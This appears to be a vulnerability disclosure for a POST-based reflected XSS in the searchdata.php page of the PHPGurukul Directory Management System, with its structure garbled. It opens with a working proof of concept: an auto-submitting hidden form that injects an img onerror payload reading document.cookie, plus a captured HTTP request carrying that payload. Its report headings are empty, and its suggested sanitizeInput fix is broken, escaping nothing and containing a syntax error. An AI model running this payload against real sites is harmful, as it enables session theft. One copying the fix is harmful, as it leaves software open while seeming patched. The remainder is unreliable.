<form id="xss" action="https://victim.com/searchdata.php" method="POST">
<input type="hidden" name="searchdata" value="<img src=x onerror=alert(document.cookie)>">
</form>
<script>document.getElementById('xss').submit();</script>
POST /Directory%20Management%20System%20PHP/dms/searchdata.php HTTP/1.1
Host: 172.20.10.4
Content-Length: 65
Cache-Control: max-age=0
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
searchdata=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E
if ($_SERVER['CONTENT_TYPE'] !== 'application/x-www-form-urlencoded') {
die("Invalid request");
}
function sanitizeInput(input) {
return input.replace(/[<>"'&]/g, function (char) {
return {'<':'<', '>':'>', '"':'"', '\'':''', '&':'&'}[char];
});
}
<input type="hidden" name="csrf_token" value="<?= generateSecureToken() ?>">
PHPGurukul Directory Management System Project - POST-based Reflected XSS in /searchdata.php
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/FIXED VERSION(S)
Submitter
Vulnerable Component
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
XMLHttpRequestto auto-submit POST dataExploitation requires user interaction but no authentication
Vulnerability details and POC
Vulnerability location:
Exploitation Flow:
Burp Request Capture:
Proof-of-Concept Evidence:
Suggested repair